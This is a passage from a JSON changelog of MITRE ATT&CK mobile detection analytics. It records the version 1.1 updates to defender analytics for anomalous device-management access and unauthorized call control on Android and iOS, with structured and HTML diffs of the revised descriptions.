nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ction.&nbsp;Because&nbsp;direct&nbsp;local&nbsp;runtime&nbsp;visibility&nbsp;is&nbsp;weaker&nbsp;tha</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;Android,&nbsp;the&nbsp;primary&nbsp;analytic&nbsp;is&nbsp;anchored&nbsp;on&nbsp;network&nbsp;direc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tionality&nbsp;plus&nbsp;supervised&nbsp;managed-app&nbsp;and&nbsp;device-state&nbsp;conte</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">xt.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--40066e48-f70c-4fbb-a2cf-d7a385171edb",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-24 17:35:08.607000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0702#AN1820",
                            "external_id": "AN1820"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1820",
                    "description": "Defender observes anomalous access to remote device management or enterprise mobility management control planes followed by device-state queries, location requests, or management actions inconsistent with user role, historical behavior, or device ownership context.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
                            "name": "saas:MDM",
                            "channel": "Authentication events to device management or enterprise mobility management consoles"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
                            "name": "saas:MDM",
                            "channel": "Device lookup, location query, or remote management operation"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "RoleDeviationThreshold",
                            "description": "Defines acceptable variance between user privileges and management actions"
                        },
                        {
                            "field": "GeoAccessAnomalyThreshold",
                            "description": "Baseline deviation tolerance for management console access locations"
                        },
                        {
                            "field": "DeviceOwnershipBaseline",
                            "description": "Expected mapping of users to managed devices"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"RoleDeviationThreshold\", \"description\": \"Defines acceptable variance between user privileges and management actions\"}, {\"field\": \"GeoAccessAnomalyThreshold\", \"description\": \"Baseline deviation tolerance for management console access locations\"}, {\"field\": \"DeviceOwnershipBaseline\", \"description\": \"Expected mapping of users to managed devices\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-24 17:35:08.607000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes anomalous access to remote device management or enterprise mobility management control planes followed by device-state queries, location requests, or management actions inconsistent with user role, historical behavior, or device ownership context.\", \"old_value\": \"Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity and alerts users when their credentials have been used on a new device. Apple iCloud also provides notifications to users of account activity such as when credentials have been used. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e\", \"name\": \"saas:MDM\", \"channel\": \"Authentication events to device management or enterprise mobility management consoles\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac\", \"name\": \"saas:MDM\", \"channel\": \"Device lookup, location query, or remote management operation\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to90__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to90__0\"><a href=\"#difflib_chg_to90__top\">t</a></td><td class=\"diff_header\" id=\"from90_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Google&nbsp;sends&nbsp;a&nbsp;notification&nbsp;to&nbsp;the&nbsp;device&nbsp;when&nbsp;Android&nbsp;Devic</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to90__top\">t</a></td><td class=\"diff_header\" id=\"to90_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;anomalous&nbsp;access&nbsp;to&nbsp;remote&nbsp;device&nbsp;manageme</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;Manager&nbsp;is&nbsp;used&nbsp;to&nbsp;locate&nbsp;it.&nbsp;Additionally,&nbsp;Google&nbsp;provide</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nt&nbsp;or&nbsp;enterprise&nbsp;mobility&nbsp;management&nbsp;control&nbsp;planes&nbsp;followed</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;the&nbsp;ability&nbsp;for&nbsp;users&nbsp;to&nbsp;view&nbsp;their&nbsp;general&nbsp;account&nbsp;activi</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;by&nbsp;device-state&nbsp;queries,&nbsp;location&nbsp;requests,&nbsp;or&nbsp;management&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ty&nbsp;and&nbsp;alerts&nbsp;users&nbsp;when&nbsp;their&nbsp;credentials&nbsp;have&nbsp;been&nbsp;used&nbsp;on</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ctions&nbsp;inconsistent&nbsp;with&nbsp;user&nbsp;role,&nbsp;historical&nbsp;behavior,&nbsp;or&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;a&nbsp;new&nbsp;device.&nbsp;Apple&nbsp;iCloud&nbsp;also&nbsp;provides&nbsp;notifications&nbsp;to&nbsp;u</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">device&nbsp;ownership&nbsp;context.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sers&nbsp;of&nbsp;account&nbsp;activity&nbsp;such&nbsp;as&nbsp;when&nbsp;credentials&nbsp;have&nbsp;been&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">used.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--6e3a93db-d2a6-43b7-9aa6-4dcf972f5e53",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-02-24 17:34:54.559000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0702#AN1821",
                            "external_id": "AN1821"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1821",
                    "description": "Defender observes anomalous authentication or session activity targeting remote device management services followed by device-tracking queries, device-state requests, or remote actions inconsistent with established user-device relationships or operational patterns.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
                            "name": "saas:MDM",
                            "channel": "Authentication events to Apple iCloud or enterprise device management services"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac",
                            "name": "saas:MDM",
                            "channel": "Device lookup, location query, or remote management operation"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "UserDeviceRelationshipDeviation",
                            "description": "Defines acceptable deviation from known user-device mappings"
                        },
                        {
                            "field": "SessionAnomalyThreshold",
                            "description": "Baseline deviation tolerance for management sessions"
                        },
                        {
                            "field": "QueryFrequencyThreshold",
                            "description": "Threshold for excessive device tracking or lookup activity"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"UserDeviceRelationshipDeviation\", \"description\": \"Defines acceptable deviation from known user-device mappings\"}, {\"field\": \"SessionAnomalyThreshold\", \"description\": \"Baseline deviation tolerance for management sessions\"}, {\"field\": \"QueryFrequencyThreshold\", \"description\": \"Threshold for excessive device tracking or lookup activity\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-02-24 17:34:54.559000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes anomalous authentication or session activity targeting remote device management services followed by device-tracking queries, device-state requests, or remote actions inconsistent with established user-device relationships or operational patterns.\", \"old_value\": \"Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity and alerts users when their credentials have been used on a new device. Apple iCloud also provides notifications to users of account activity such as when credentials have been used. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e\", \"name\": \"saas:MDM\", \"channel\": \"Authentication events to Apple iCloud or enterprise device management services\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--8c826308-2760-492f-9e36-4f0f7e23bcac\", \"name\": \"saas:MDM\", \"channel\": \"Device lookup, location query, or remote management operation\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to172__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to172__0\"><a href=\"#difflib_chg_to172__top\">t</a></td><td class=\"diff_header\" id=\"from172_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Google&nbsp;sends&nbsp;a&nbsp;notification&nbsp;to&nbsp;the&nbsp;device&nbsp;when&nbsp;Android&nbsp;Devic</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to172__top\">t</a></td><td class=\"diff_header\" id=\"to172_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;anomalous&nbsp;authentication&nbsp;or&nbsp;session&nbsp;activi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;Manager&nbsp;is&nbsp;used&nbsp;to&nbsp;locate&nbsp;it.&nbsp;Additionally,&nbsp;Google&nbsp;provide</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ty&nbsp;targeting&nbsp;remote&nbsp;device&nbsp;management&nbsp;services&nbsp;followed&nbsp;by&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;the&nbsp;ability&nbsp;for&nbsp;users&nbsp;to&nbsp;view&nbsp;their&nbsp;general&nbsp;account&nbsp;activi</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">evice-tracking&nbsp;queries,&nbsp;device-state&nbsp;requests,&nbsp;or&nbsp;remote&nbsp;act</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ty&nbsp;and&nbsp;alerts&nbsp;users&nbsp;when&nbsp;their&nbsp;credentials&nbsp;have&nbsp;been&nbsp;used&nbsp;on</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ions&nbsp;inconsistent&nbsp;with&nbsp;established&nbsp;user-device&nbsp;relationships</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;a&nbsp;new&nbsp;device.&nbsp;Apple&nbsp;iCloud&nbsp;also&nbsp;provides&nbsp;notifications&nbsp;to&nbsp;u</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;or&nbsp;operational&nbsp;patterns.</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">sers&nbsp;of&nbsp;account&nbsp;activity&nbsp;such&nbsp;as&nbsp;when&nbsp;credentials&nbsp;have&nbsp;been&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">used.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--d2cf1cf2-7b11-4018-b5bc-fbd48633f869",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-09 17:53:31.236000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0703#AN1822",
                            "external_id": "AN1822"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1822",
                    "description": "The defender correlates call-control capability or telecom role state with subsequent unauthorized call initiation, answer, block, redirect, or concealment behavior by an application outside expected telephony workflows. The analytic prioritizes Android-observable control-plane effects: dangerous or role-gated call-control permissions, default dialer or ConnectionService-related role changes, telecom framework invocation for call placement or handling, write activity against call-log records, and call-control activity occurring from background or locked-device context without recent user interaction.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Managed app granted call-control-relevant permissions or telecom role state inconsistent with approved enterprise function before call-control activity"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Default phone or telecom-handling role changes to non-baselined application or managed app unexpectedly becomes dialer/call-handling app during call-control phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between permission or role state, call-control action, call-log mutation, and follow-on network communication"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to initiate or manage calls, such as default dialers, carrier tools, enterprise communications apps, or approved call-screening apps"
                        },
                        {
                            "field": "AllowedDialerRoles",
                            "description": "Approved packages allowed to become default dialer or telecom-managing app on managed devices"
                        },
                        {
                            "field": "AllowedDestinationList",
                            "description": "Approved network destinations associated with legitimate VoIP, carrier, or enterprise communications workflows"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether call-control actions should occur only during active user-driven workflows"
                        },
                        {
                            "field": "CallLogModificationThreshold",
                            "description": "Number of call-log insert, update, or delete operations within a short interval required before alerting"
                        },
                        {
                            "field": "CallActionRateThreshold",
                            "description": "Maximum expected rate of call placement, answer, redirect, or block actions for legitimate app behavior"
                        },
                        {
                            "field": "HighRiskNumberPatterns",
                            "description": "Environment-specific list of suspicious, premium-rate, or adversary-known phone-number patterns"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between permission or role state, call-control action, call-log mutation, and follow-on network communication\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to initiate or manage calls, such as default dialers, carrier tools, enterprise communications apps, or approved call-screening apps\"}, {\"field\": \"AllowedDialerRoles\", \"description\": \"Approved packages allowed to become default dialer or telecom-managing app on managed devices\"}, {\"field\": \"AllowedDestinationList\", \"description\": \"Approved network destinations associated with legitimate VoIP, carrier, or enterprise communications workflows\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether call-control actions should occur only during active user-driven workflows\"}, {\"field\": \"CallLogModificationThreshold\", \"description\": \"Number of call-log insert, update, or delete operations within a short interval required before alerting\"}, {\"field\": \"CallActionRateThreshold\", \"description\": \"Maximum expected rate of call placement, answer, redirect, or block actions for legitimate app behavior\"}, {\"field\": \"HighRiskNumberPatterns\", \"description\": \"Environment-specific list of suspicious, premium-rate, or adversary-known phone-number patterns\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-09 17:53:31.236000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates call-control capability or telecom role state with subsequent unauthorized call initiation, answer, block, redirect, or concealment behavior by an application outside expected telephony workflows. The analytic prioritizes Android-observable control-plane effects: dangerous or role-gated call-control permissions, default dialer or ConnectionService-related role changes, telecom framework invocation for call placement or handling, write activity against call-log records, and call-control activity occurring from background or locked-device context without recent user interaction.\", \"old_value\": \"The user can review available call logs for irregularities, such as missing or unrecognized calls.\\nThe user can view their default phone app in device settings.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-The user can review available call logs for irregularities, such as missing or unrecognized calls.\\n-The user can view their default phone app in device settings.\\n+The defender correlates call-control capability or telecom role state with subsequent unauthorized call initiation, answer, block, redirect, or concealment behavior by an application outside expected telephony workflows. The analytic prioritizes Android-observable control-plane effects: dangerous or role-gated call-control permissions, default dialer or ConnectionService-related role changes, telecom framework invocation for call placement or handling, write activity against call-log records, and call-control activity occurring from background or locked-device context without recent user interaction.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Managed app granted call-control-relevant permissions or telecom role state inconsistent with approved enterprise function before call-control activity\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4\", \"name\": \"User Interface\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Default phone or telecom-handling role changes to non-baselined application or managed app unexpectedly becomes dialer/call-handling app during call-control phase\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6\", \"name\": \"User Interface\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to144__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to144__0\"><a href=\"#difflib_chg_to144__top\">t</a></td><td class=\"diff_header\" id=\"from144_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">The&nbsp;user&nbsp;can&nbsp;review&nbsp;available&nbsp;call&nbsp;logs&nbsp;for&nbsp;irregularities,&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to144__top\">t</a></td><td class=\"diff_header\" id=\"to144_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;call-control&nbsp;capability&nbsp;or&nbsp;telecom&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">such&nbsp;as&nbsp;missing&nbsp;or&nbsp;unrecognized&nbsp;calls.&nbsp;The&nbsp;user&nbsp;can&nbsp;view&nbsp;the</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ole&nbsp;state&nbsp;with&nbsp;subsequent&nbsp;unauthorized&nbsp;call&nbsp;initiation,&nbsp;answ</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ir&nbsp;default&nbsp;phone&nbsp;app&nbsp;in&nbsp;device&nbsp;settings.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er,&nbsp;block,&nbsp;redirect,&nbsp;or&nbsp;concealment&nbsp;behavior&nbsp;by&nbsp;an&nbsp;applicati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on&nbsp;outside&nbsp;expected&nbsp;telephony&nbsp;workflows.&nbsp;The&nbsp;analytic&nbsp;priori</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tizes&nbsp;Android-observable&nbsp;control-plane&nbsp;effects:&nbsp;dangerous&nbsp;or</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;role-gated&nbsp;call-control&nbsp;permissions,&nbsp;default&nbsp;dialer&nbsp;or&nbsp;Conn</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ectionService-related&nbsp;role&nbsp;changes,&nbsp;telecom&nbsp;framework&nbsp;invoca</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion&nbsp;for&nbsp;call&nbsp;placement&nbsp;or&nbsp;handling,&nbsp;write&nbsp;activity&nbsp;against&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">call-log&nbsp;records,&nbsp;and&nbsp;call-control&nbsp;activity&nbsp;occurring&nbsp;from&nbsp;b</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ackground&nbsp;or&nbsp;locked-device&nbsp;context&nbsp;without&nbsp;recent&nbsp;user&nbsp;inter</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">action.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--ffcee6e2-02dd-4053-92a3-8600dd70445e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-13 23:48:31.416000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0704#AN1823",
                            "external_id": "AN1823"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
